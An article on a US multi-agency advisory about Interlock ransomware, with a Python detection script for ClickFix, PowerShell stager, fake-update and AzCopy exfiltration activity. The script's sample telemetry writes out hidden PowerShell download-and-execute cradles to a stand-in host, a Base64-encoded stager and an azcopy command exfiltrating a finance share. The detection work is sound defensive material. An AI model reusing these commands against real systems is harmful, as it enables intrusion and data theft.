US Agencies Warn of Rising Interlock Ransomware Threat to Healthcare Sector

TL/DR –

Four major U.S. agencies have issued a joint cybersecurity alert about the rising threat from the Interlock ransomware operation, which has targeted businesses, healthcare providers, and critical infrastructure across North America and Europe. Emerging in September 2024, the group uses a double-extortion model, encrypting systems, stealing data, and threatening to publish stolen files if ransom is not paid. To protect against Interlock attacks, organizations are urged to implement DNS filtering, use web application firewalls, keep systems updated, enforce multifactor authentication, segment networks, train employees in threat identification, and maintain secure backups of critical data.


US Agencies Warn of Escalating Interlock Ransomware Threats

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have jointly issued a cybersecurity alert. This urgent warning emphasizes the escalating threat posed by the Interlock ransomware operation, primarily targeting businesses, healthcare providers, and critical infrastructure across North America and Europe.

Interlock, which emerged in September 2024, runs financially motivated campaigns on a double-extortion model: the actors exfiltrate data before encrypting the victim’s systems, then threaten to publish the stolen files if the ransom is not paid.

The ransom note states no amount. Victims instead receive a unique code and are directed to a .onion URL on the Tor network to open negotiations. Although opportunistic in target selection, the Interlock actors frequently hit healthcare organizations; high-profile victims include Kettering Health and Fortune 500 company DaVita.

Interlock’s Uncommon Entry Tactics

Interlock’s initial access is unusual for a ransomware operation: drive-by downloads from compromised legitimate websites, with the payload disguised as a fake browser or security-software update. The group also uses the “ClickFix” and “FileFix” social-engineering techniques, which present a fake error or verification prompt and walk the user through pasting a command into the Windows Run dialog (ClickFix) or the File Explorer address bar (FileFix), so the victim executes the malicious code under the guise of fixing the problem.

Once inside, the actors deploy remote access trojans such as Interlock RAT and NodeSnake RAT to control the host, communicate with command-and-control servers, and stage further activity. PowerShell scripts then pull down a credential stealer and a keylogger, which harvest usernames, passwords, and keystrokes used for lateral movement and privilege escalation.

The group also abuses legitimate Microsoft tooling, Azure Storage Explorer and AzCopy, to exfiltrate data to attacker-controlled cloud storage. On the non-Windows side it carries an uncommon ELF encryptor built for FreeBSD, a departure from the VMware ESXi-focused Linux payloads typical of other ransomware families.
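The tradecraft in the three paragraphs above (the ClickFix/FileFix paste, the PowerShell stager that fetches the stealer, and AzCopy pushing data to blob storage) each leaves a distinctive parent/child/command-line shape in process-creation telemetry, which is what a hunt should key on rather than on hashes. The following is an added example written for this page, not code from the advisory or the agencies; the log records mimic a simplified Sysmon Event ID 1 layout, and the hostnames, paths, the example.invalid URLs, the example-exfil storage account and the rule thresholds are all constructed assumptions to tune against your own telemetry.

```python
"""Hunt for Interlock-style tradecraft in process-creation telemetry (added example, not the advisory's code)."""
import base64
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:          # one simplified Sysmon EID 1 / EDR process-creation record (constructed format)
    host: str
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
POWERSHELLS = {"powershell.exe", "pwsh.exe"}
CLOUD_COPY_TOOLS = {"azcopy.exe", "storageexplorer.exe", "microsoft azure storage explorer.exe"}

# Download-and-run primitives typical of ClickFix/FileFix one-liners and stager scripts.
CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|"
    r"Invoke-Expression|\biex\b|FromBase64String|Start-BitsTransfer|Net\.WebClient",
    re.IGNORECASE,
)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b", re.IGNORECASE)
ENCODED = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
BLOB_URL = re.compile(r"https://[\w.-]+\.blob\.core\.windows\.net/\S*", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(downloads|temp|appdata)\\", re.IGNORECASE)


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def decode_encoded_command(cmdline: str):
    """Plaintext of a PowerShell -EncodedCommand argument (Base64 of UTF-16LE), or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def effective_command_line(ev: ProcEvent) -> str:
    """Command line with any encoded payload expanded, so the regexes see the real script."""
    decoded = decode_encoded_command(ev.command_line)
    return ev.command_line if decoded is None else f"{ev.command_line} <decoded: {decoded}>"


def hunt(events):
    findings = []
    for ev in events:
        parent, image = basename(ev.parent_image), basename(ev.image)
        cmd = effective_command_line(ev)
        # ClickFix / FileFix: the victim pastes the "fix" into the Run dialog or the File
        # Explorer address bar, so explorer.exe ends up as the parent of the resulting shell.
        if parent == "explorer.exe" and image in SHELLS and (CRADLE.search(cmd) or HIDDEN.search(cmd)):
            findings.append(Finding(ev.host, "clickfix_filefix_shell_from_explorer", cmd))
        # Stager behaviour: PowerShell fetching and running a remote payload (RAT, credential stealer).
        if image in POWERSHELLS and CRADLE.search(cmd) and re.search(r"https?://", cmd, re.IGNORECASE):
            findings.append(Finding(ev.host, "powershell_download_cradle", cmd))
        # Drive-by fake update: a browser launches an "update" binary from a user-writable directory.
        if parent in BROWSERS and USER_WRITABLE.search(ev.image) and "update" in image:
            findings.append(Finding(ev.host, "fake_update_from_browser", ev.image))
        # Exfiltration with legitimate Azure tooling: AzCopy / Storage Explorer pushing data to a
        # blob endpoint. The finding carries the destination so it can be checked against your tenant.
        m = BLOB_URL.search(cmd)
        if image in CLOUD_COPY_TOOLS and m:
            findings.append(Finding(ev.host, "azcopy_to_blob_storage", m.group(0).split("?")[0]))
    return findings


# Constructed sample telemetry. The encoded stager is built here the way an attacker would build it.
STAGER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadFile('http://example.invalid/s.exe','C:\\Users\\Public\\s.exe')"
ENCODED_STAGER = base64.b64encode(STAGER_SCRIPT.encode("utf-16-le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    ProcEvent("WS-042", r"C:\Windows\explorer.exe", PS,  # ClickFix paste into Win+R
              "powershell -w hidden -nop -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/fix.ps1')\""),
    ProcEvent("SRV-01", r"C:\Windows\System32\svchost.exe", PS,  # benign scheduled task
              r"powershell -File C:\Scripts\nightly-backup.ps1"),
    ProcEvent("WS-017", r"C:\Program Files\Google\Chrome\Application\chrome.exe",  # drive-by fake update
              r"C:\Users\jdoe\Downloads\ChromeUpdate.exe", "ChromeUpdate.exe"),
    ProcEvent("WS-023", r"C:\Windows\System32\cmd.exe", PS,  # encoded stager pulling the stealer
              f"powershell -nop -w hidden -enc {ENCODED_STAGER}"),
    ProcEvent("FS-03", r"C:\Windows\System32\cmd.exe", r"C:\Users\jdoe\Downloads\azcopy.exe",  # exfil
              'azcopy copy "D:\\Shares\\Finance" "https://example-exfil.blob.core.windows.net/dump?sv=2022-11-02&sig=REDACTED" --recursive'),
    ProcEvent("WS-099", r"C:\Windows\explorer.exe", PS, "powershell.exe"),  # user opened a console: no finding
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.host:7} {f.rule:38} {f.detail[:70]}")
```

Two design points are worth noting. Expanding -EncodedCommand before matching is what lets the cradle rule see the stealer download in the WS-023 record; without it the Base64 blob matches nothing. And the AzCopy rule deliberately does not treat the tool itself as malicious, since backup jobs use it legitimately; it surfaces the destination account so an analyst can confirm it belongs to the organisation's own tenant.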

Protecting Against Potential Interlock Attacks

To mitigate the risk of an Interlock ransomware attack, the federal advisory recommends several defense measures. These include implementing DNS filtering, using web application firewalls, keeping system and software updates current, enforcing multifactor authentication, segmenting networks, training employees, and maintaining secure backups.

For more mitigation strategies and free cybersecurity resources, organizations are advised to visit stopransomware.gov. If you suspect or have experienced ransomware or malicious activity, contact your local FBI office or report to CISA via the agency’s Incident Reporting System.
